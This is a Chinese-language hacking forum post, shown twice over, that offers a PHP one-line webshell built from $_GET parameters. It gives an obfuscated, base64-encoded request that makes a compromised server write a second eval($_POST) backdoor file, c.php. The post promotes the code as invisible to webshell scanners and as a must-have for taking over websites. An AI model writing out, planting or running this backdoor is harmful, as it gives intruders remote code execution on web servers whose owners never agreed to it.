一枚隐蔽的PHP一句话木马
一句话木马, PHP一句话, 木马
本帖隐藏的内容需要回复才可以浏览
代码:<?php $_GET[a]($_GET[b]);?>
复制代码仅用GET函数就构成了木马;
利用方法:?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
复制代码执行后当前目录生成c.php一句话木马
(PS:当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马)
注:本木马隐蔽性极强,直接无视查马工具(谁会把GET当做PHP木马的特征码?),是喜欢拿站亲们的必备好马!!!
一句话木马, PHP一句话, 木马
本帖隐藏的内容需要回复才可以浏览
代码:<?php $_GET[a]($_GET[b]);?>
复制代码仅用GET函数就构成了木马;
利用方法:?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
复制代码执行后当前目录生成c.php一句话木马
(PS:当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马)
注:本木马隐蔽性极强,直接无视查马工具(谁会把GET当做PHP木马的特征码?),是喜欢拿站亲们的必备好马!!!
